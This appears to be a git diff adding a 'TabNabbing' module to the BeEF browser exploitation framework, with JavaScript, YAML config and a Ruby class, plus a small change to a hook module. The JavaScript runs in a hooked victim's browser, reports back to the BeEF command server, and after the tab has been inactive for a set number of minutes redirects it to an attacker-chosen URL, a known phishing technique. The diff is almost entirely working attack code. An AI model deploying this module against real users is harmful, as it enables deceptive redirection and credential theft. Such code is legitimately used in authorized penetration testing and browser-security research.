diff --git a/modules/browser/tabnapping/command.js b/modules/browser/tabnapping/command.js new file mode 100644 index 000000000..ab90d036f --- /dev/null +++ b/modules/browser/tabnapping/command.js @@ -0,0 +1,38 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var url = "<%= @url %>"; + var wait = <%= @wait %>*1000*60; + var tabnab_timer; + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=waiting for tab to become inactive'); + + // begin countdown when the tab loses focus + window.onblur = function() { + begin_countdown(); + } + + // stop countdown if the tab regains focus + window.onfocus = function() { + clearTimeout(tabnab_timer); + } + + begin_countdown = function() { + tabnab_timer = setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=redirected'); window.location = url; }, wait); + } + +}); diff --git a/modules/browser/tabnapping/config.yaml b/modules/browser/tabnapping/config.yaml new file mode 100644 index 000000000..8f078e427 --- /dev/null +++ b/modules/browser/tabnapping/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + tabnabbing: + enable: true + category: "Browser" + name: "TabNabbing" + description: "This module redirects to the specified URL after the tab has been inactive for a specified amount of time." + authors: ["bcoles"] + target: + user_notify: ["All"] + diff --git a/modules/browser/tabnapping/module.rb b/modules/browser/tabnapping/module.rb new file mode 100644 index 000000000..823045a2b --- /dev/null +++ b/modules/browser/tabnapping/module.rb @@ -0,0 +1,33 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Tabnabbing < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + return [ + { 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width'=>'400px' }, + { 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width'=>'150px' } + ] + end + + def post_execute + content = {} + content['tabnab'] = @datastore['tabnab'] + save content + end + +end diff --git a/modules/host/hook_default/module.rb b/modules/host/hook_default/module.rb index 80eca4db3..80bc111a4 100644 --- a/modules/host/hook_default/module.rb +++ b/modules/host/hook_default/module.rb @@ -15,8 +15,17 @@ # class Hook_ie < BeEF::Core::Command - + + def self.options + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" + return [ + #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, + ] + end + def pre_send + #Get the servers configurations. configuration = BeEF::Core::Configuration.instance